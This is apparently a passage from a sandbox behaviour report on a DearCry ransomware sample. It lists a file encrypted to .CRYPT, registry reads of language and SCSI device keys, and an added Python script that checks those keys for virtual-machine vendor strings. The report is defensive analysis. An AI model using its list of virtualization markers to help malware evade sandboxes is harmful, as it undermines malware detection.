File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\THMBNAIL.PNG.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
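Every row in the SCSI table above names C:\Windows\explorer.exe as the process, not the sample, and the keys touched belong to four device instances: one QEMU DVD-ROM, two Msft Virtual DVD-ROMs and one disk whose vendor string is DADY. The script below is an added example written for this page; it is not part of the report and not the sandbox's own tooling. It parses rows in the report's flattened Description/Indicator/Process/Target layout (eight rows copied from the table above are embedded as constructed input), pulls the SCSI device identifier out of each key path, classifies vendor and product strings against a marker list (QEMU, VBOX, VMWARE, VIRTUAL, XEN; an assumption modelled on common anti-VM checks, not a list recovered from this sample) and tallies accesses per device and per process. That is the check to run before treating a table like this one as evidence that the sample itself fingerprints the hypervisor.

```python
"""Parse flattened sandbox registry rows and classify the SCSI devices they
touch against virtualization vendor/product strings. Added example for this
page; the marker list is an assumption, not taken from the sample."""
import re
from collections import Counter

# Constructed input: eight rows copied from the SCSI registry table in this
# report, in its flattened "Description Indicator Process Target" layout.
SAMPLE_ROWS = r"""
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Windows\explorer.exe N/A
"""

# Description column values that occur in this report's registry tables.
DESCRIPTIONS = ("Key value queried", "Key opened", "Key created",
                "Set value (data)", "Set value (int)", "Set value (str)")

# Assumed marker list: substrings that common anti-VM checks look for in SCSI
# identifiers. VIRTUAL also catches Hyper-V's "Virtual DVD-ROM"/"Virtual Disk".
VM_MARKERS = ("QEMU", "VBOX", "VMWARE", "VIRTUAL", "XEN")

# \Enum\SCSI\<device id>\<instance id>
SCSI_RE = re.compile(r"\\Enum\\SCSI\\([^\\]+)\\([^\\]+)")


def parse_row(line):
    """Split one flattened row into its four columns; None if not a row."""
    for desc in DESCRIPTIONS:
        if line.startswith(desc + " "):
            rest = line[len(desc) + 1:]
            break
    else:
        return None
    rest, target = rest.rsplit(" ", 1)        # Target is the last token
    indicator, process = rest.rsplit(" ", 1)  # process paths here carry no spaces
    return {"description": desc, "indicator": indicator,
            "process": process, "target": target}


def parse_device_id(device_id):
    """'CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM' -> ('CdRom', 'QEMU', 'QEMU_DVD-ROM')."""
    parts = device_id.split("&")
    vendor = next((p[4:] for p in parts if p.startswith("Ven_")), "")
    product = next((p[5:] for p in parts if p.startswith("Prod_")), "")
    return parts[0], vendor, product


def vm_markers_in(*strings):
    """Markers found (case-insensitively) in any of the given strings."""
    haystack = " ".join(strings).upper()
    return [m for m in VM_MARKERS if m in haystack]


def assess(rows_text):
    """Aggregate SCSI rows: per-device access counts, instances, VM markers,
    plus per-process and per-operation totals."""
    devices, per_process, ops = {}, Counter(), Counter()
    for line in rows_text.strip().splitlines():
        row = parse_row(line.strip())
        if row is None:
            continue
        m = SCSI_RE.search(row["indicator"])
        if not m:
            continue
        device_id, instance = m.group(1), m.group(2)
        dev_class, vendor, product = parse_device_id(device_id)
        entry = devices.setdefault(device_id, {
            "class": dev_class, "vendor": vendor, "product": product,
            "vm_markers": vm_markers_in(vendor, product),
            "instances": set(), "accesses": 0})
        entry["instances"].add(instance)
        entry["accesses"] += 1
        per_process[row["process"]] += 1
        ops[row["description"]] += 1
    return {"devices": devices, "per_process": per_process, "operations": ops}


def vm_verdict(result):
    """True if any enumerated SCSI device carries a virtualization marker."""
    return any(d["vm_markers"] for d in result["devices"].values())


if __name__ == "__main__":
    res = assess(SAMPLE_ROWS)
    for dev_id, d in res["devices"].items():
        print(f"{dev_id}: {d['accesses']} accesses, {len(d['instances'])} instance(s), "
              f"VM markers: {','.join(d['vm_markers']) or 'none'}")
    print("per process:", dict(res["per_process"]))
    print("VM indicators present:", vm_verdict(res))
```

Against the embedded rows it reports a QEMU marker on the QEMU drive and a VIRTUAL marker on both Msft drives, no marker on the DADY disk, and all eight accesses from explorer.exe; paste the full table into SAMPLE_ROWS to get the complete counts. The DADY string matching nothing is the interesting line for a practitioner, since a physical-looking disk vendor next to a QEMU optical drive is what a partially masked guest looks like.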

Modifies Internet Explorer settings

adware spyware

Both rows below are C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe (the Windows Search UI host, started with -ServerName:CortanaUI... as shown under Processes) creating its own Internet Explorer\GPU key in the user hive; nothing in this table is attributed to the sample, so the adware/spyware tags should not be read as sample behaviour without a row from the sample's own process.
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "129" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\NumberOfSubdomains = "2" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1750093773-264148664-1320403265-1000\{54BC93C3-1377-4A14-9BE0-4F794E59B614} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1750093773-264148664-1320403265-1000\{12DBA035-02B1-4671-BC85-F1C1A4063E0D} C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "0" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
